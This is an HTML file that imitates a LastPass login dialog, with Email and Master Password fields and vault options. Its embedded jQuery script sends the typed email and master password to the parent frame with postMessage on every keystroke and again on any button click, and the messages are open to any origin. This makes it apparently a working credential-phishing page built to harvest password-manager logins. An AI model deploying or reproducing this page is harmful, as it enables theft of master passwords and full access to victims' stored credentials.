67 lines
3.1 KiB
HTML
Executable File
67 lines
3.1 KiB
HTML
Executable File
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta http-equiv="Pragma" CONTENT="no-cache"><meta http-equiv="Expires" CONTENT="0"><meta http-equiv="CACHE-CONTROL" CONTENT="no-cache">
|
|
<style type="text/css">
|
|
body { font-family: Helvetica,Arial;
|
|
color:-moz-DialogText;
|
|
background-color: #ededed;
|
|
font: message-box;
|
|
}
|
|
|
|
|
|
</style>
|
|
<script src="jquery.js" type="text/javascript"></script>
|
|
<script>
|
|
$(document).ready(function() {
|
|
$('#u').keyup(function() {
|
|
parent.postMessage('Username field changed to: ' + $('#u').val(),'*');
|
|
});
|
|
|
|
$('#p').keyup(function() {
|
|
parent.postMessage('Password field changed to: ' + $('#p').val(),'*');
|
|
});
|
|
|
|
$('#rememberemail').change(function() {
|
|
parent.postMessage('Remember Email changed to: ' + $('#rememberemail').prop('checked'),'*');
|
|
});
|
|
|
|
$('#rememberpassword').change(function() {
|
|
parent.postMessage('Remember Password changed to: ' + $('#rememberpassword').prop('checked'),'*');
|
|
});
|
|
|
|
$('#showvault').change(function() {
|
|
parent.postMessage('Show Vault changed to: ' + $('#showvault').prop('checked'),'*');
|
|
});
|
|
|
|
$('#login,#cancel,#forgot,#screenkeyboard,#createaccount').click(function() {
|
|
parent.postMessage('Button Clicked - username field: ' + $('#u').val() + '; password field: ' + $('#p').val(),'*');
|
|
parent.postMessage('KILLFRAME','*');
|
|
});
|
|
|
|
});
|
|
|
|
</script>
|
|
</head><body>
|
|
|
|
<div style="text-align: center; padding-bottom:5px"><img src="/img/icon.png" /></div>
|
|
<form>
|
|
<div style="text-align: center">
|
|
<div style="text-align: left; padding-left: 12px; padding-bottom:5px">Email</div>
|
|
<div style="text-align: left; padding-left: 12px; padding-bottom:5px"><input type="text" style="width:220px;height:20px" id='u' /></div>
|
|
<div style="text-align: left; padding-left: 12px;padding-bottom:5px">Master Password</div>
|
|
<div style="text-align: left; padding-left: 12px;padding-bottom:10px"><input type="password" style="width:220px;height:20px" id='p' /></div>
|
|
<div style="text-align: left; padding-left: 12px; padding-bottom:5px"><input type="checkbox" checked="checked" id='rememberemail'>Remember Email</input></div>
|
|
<div style="text-align: left; padding-left: 12px; padding-bottom:5px"><input type="checkbox" id='rememberpassword'>Remember Password</input></div>
|
|
<div style="text-align: left; padding-left: 12px; padding-bottom:10px"><input type="checkbox" checked="checked" id='showvault'>Show My LastPass Vault After Login</input></div>
|
|
</div>
|
|
|
|
<div style="text-align:center; padding-left: 15px; padding-bottom:5px">
|
|
<div style="text-align:left; padding-bottom: 10px"><a href="#" style="text-decoration: none" id='forgot'>I forgot my password, Help!</a></div>
|
|
<div style="text-align:left; padding-bottom: 10px"><a href="#" style="text-decoration: none" id='screenkeyboard'>Screen Keyboard</a> <a href="#" style="text-decoration: none" id='createaccount'>Create an Account</a></div>
|
|
</div>
|
|
|
|
<div style="text-align:right">
|
|
<input type="button" value="Cancel" style="width:77px; height:21px" id='cancel' /> <input type="button" value="Login" style="width:77px; height:21px" id='login' />
|
|
</div>
|
|
</form>
|
|
|
|
|
|
</body></html> |